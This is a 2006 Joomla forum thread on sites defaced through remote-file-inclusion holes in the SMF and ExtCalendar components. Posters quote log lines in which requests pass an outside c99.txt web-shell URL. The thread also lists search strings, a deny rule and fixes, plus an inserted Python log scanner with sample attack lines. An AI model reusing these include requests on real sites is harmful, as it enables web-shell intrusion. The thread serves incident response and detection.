Joomla/MamboHacked Sites By eno7
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Joomla/MamboHacked Sites By eno7
I had a look here:
http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1
Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.
Does anyone have any ideas?
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Re: Joomla/MamboHacked Sites By eno7
We used to have a phpBB forum but changed it to vBulletin about a year ago, but there is still a phpbb component installed - my other half is the techie and he did tell me at the weekend why we can't remove it, but I can't remember why right now - I went through all the components and modules that we don't need/use and removed them, as well as updating any to the latest versions etc... and my other half has tried changing settings to make it even more secure, but he still got to the site for a second time. I'm just glad we take regular backups and save them elsewhere.
Mike G. wrote:
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
@Maggles,
I have sent you a Personal Message.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Re: Joomla/MamboHacked Sites By eno7
Thanks, I've emailed you to the address you supplied.
RobS wrote: @Maggles,
I have sent you a Personal Message.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
The attack on our site came from 81.213.180.37, also a Turkish site.
As I found in the logfiles, they used a PHP/BackDoor script infecting the site through the phpBB download feature !!!
CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omitted - ChiefGoFor] and might become active if you follow the link; my virus scanner (McAfee) was detecting it in the browser.
Regards,
Mike
Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.
- LorenzoG
- Joomla! Hero
- Posts: 2983
- Joined: Fri Aug 19, 2005 8:46 am
- Location: Stockholm, Sweden
Re: Joomla/MamboHacked Sites By eno7
Warning, the above link contains a trojan virus script .. as advised by the poster
Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.
Industributik - http://www.industributiken.se
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Regards,
Mike
- ChiefGoFor
- Joomla! Champion
- Posts: 5614
- Joined: Tue Sep 13, 2005 12:22 am
- Location: Omaha, Nebraska, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I agree with you. It was kind of a catch-22 there. Your solution of searching for those key terms is great! Thank you for the information.
Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
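An added example (not from any poster in this thread) of the log search Mike G., RobS and infograf768 recommend: it parses Apache combined-format access log lines, flags any request whose query-string value is itself a URL (the remote-include shape of the log lines posted in this thread) and reports which of the thread's search terms matched. The sample log lines are constructed, modelled on the posted ones, with "attacker.example" standing in for the hosts the moderators redacted.

```python
"""Added example: scan Apache combined-format logs for the remote-include attempts and indicator strings discussed in this thread."""
import re
from urllib.parse import parse_qsl, urlsplit

# Search terms suggested in the thread by Mike G. and RobS; infograf768's
# "mosconfig" is covered by the case-insensitive comparison in scan().
INDICATORS = ("eno7", "c99.txt", "CONFIG_EXT",
              "mosConfig_absolute_path", "mosConfig_live_site")

# Combined log format: client identd user [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample lines modelled on the ones posted in the thread;
# "attacker.example" stands in for the hosts the moderators redacted.
SAMPLE_LOG = [
    '85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php'
    '?mosConfig_absolute_path=http://attacker.example/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0"',
    '85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php'
    '?CONFIG_EXT[LANGUAGES_DIR]=http://attacker.example/images/c99.txt?ls HTTP/1.0" 200 18278 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [18/Jul/2006:10:15:02 -0400] "GET /index.php?option=com_content&task=view&id=12'
    ' HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Fields of one combined-format line, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def remote_params(target):
    """Query parameters whose value is itself a URL: the shape of a remote include
    through an unvalidated global such as mosConfig_absolute_path."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if re.match(r'(?i)(https?|ftp)://', value)]

def scan(lines):
    """One record per suspicious request: source IP, script hit, HTTP status,
    remote-URL parameters and the thread indicators that matched."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        remote = remote_params(rec["target"])
        words = [w for w in INDICATORS if w.lower() in line.lower()]
        if remote or words:
            hits.append({"ip": rec["ip"], "path": urlsplit(rec["target"]).path,
                         "status": rec["status"], "remote": remote, "indicators": words})
    return hits

def source_ips(hits):
    """Distinct client addresses behind the hits (dynamic addresses make a plain deny list a weak fix)."""
    return sorted({h["ip"] for h in hits})

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], hit["remote"], hit["indicators"])
```

A status of 200 on such a request, as in both posted log lines, means the script answered the request and the included file may have executed; compare against a clean backup rather than trusting the file listing.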
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Our site also got hacked this weekend by this same Eno7 guy - his page overwrites your configuration.php file - how do we prevent this from happening again... this is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla powered sites? Everything in our root folder of our site is read-only, so how did this happen?
Thanks
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
- ChiefGoFor
- Joomla! Champion
- Posts: 5614
- Joined: Tue Sep 13, 2005 12:22 am
- Location: Omaha, Nebraska, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
To my knowledge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla security measures. I think in your case the culprit is SMF.
RobS knows more about it than I do, so I will let him give you a more formal answer.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
What are the practical steps to restore the website? We've just been hacked through the SMF component:
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
And then what are the practical steps to prevent it from recurring?
Thank you
Anna
Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
Concerning SMF
http://forum.joomla.org/index.php/topic,76520.0.html
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Thank you
Anna
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Thanks...
One question... will that fix prevent this clown from doing this again?
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
-
- Joomla! Apprentice
- Posts: 10
- Joined: Tue Aug 30, 2005 1:19 pm
- Location: Hamburg
Re: Joomla/MamboHacked Sites By eno7
I'd love to know that!
CiPHeR wrote: One question... will that fix prevent this clown from doing this again?
anybody.. :-*
-
- Joomla! Apprentice
- Posts: 17
- Joined: Sun Jul 09, 2006 10:41 am
Re: Joomla/MamboHacked Sites By eno7
Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
If it comes from the same place
Or disable the component and upgrade
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: Joomla/MamboHacked Sites By eno7
That won't help since it is a dynamic IP of that provider, who is known to support or at least not do anything against hackers (his name is not allowed to be told in these forums, otherwise you get flamed). The same computer may have another IP next time.
zomertje wrote: Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
You would need to ban all IPs of that provider. In case you need them PM me and I will send you the whole range.
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.
CiPHeR wrote: Thanks...
One question... will that fix prevent this clown from doing this again?
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
- rliskey
- Joomla! Guru
- Posts: 828
- Joined: Tue Jun 06, 2006 7:41 am
- Location: California, Germany, Norway
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.
What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.
Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.
If Joomla pros would like log files or other details, contact me.
I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.
- rliskey
- Joomla! Guru
- Posts: 828
- Joined: Tue Jun 06, 2006 7:41 am
- Location: California, Germany, Norway
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
Using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I don't know why all hosts DON'T have register globals=OFF!
anna.y wrote: Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.
CiPHeR wrote: Thanks...
One question... will that fix prevent this clown from doing this again?
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Joomla/MamboHacked Sites By eno7
register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
CiPHeR wrote: I don't know why all hosts DON'T have register globals=OFF!
So, if people do not report to their hosts when sites get hacked, or don't ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I got hacked through an older version of com_SMF and deleting all root files and re-installing everything was NOT an option.
infograf768 wrote: using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.
It was rather simple and, as I said, despite hundreds of attempts at hacking I'm having no further problems (keeping my fingers crossed is probably helping as well... )
Anna
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 09, 2006 8:13 am
Re: Joomla/MamboHacked Sites By eno7
How was he able to alter the MySQL db?
-
- Joomla! Intern
- Posts: 76
- Joined: Thu Sep 01, 2005 5:41 am
Re: Joomla/MamboHacked Sites By eno7
I was hacked by a Turkish hacker today.
rliskey wrote: Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
[14-Aug-2006 07:20:22] PHP Warning: main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
What you are posting looks like the error log and not the raw logs.
Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group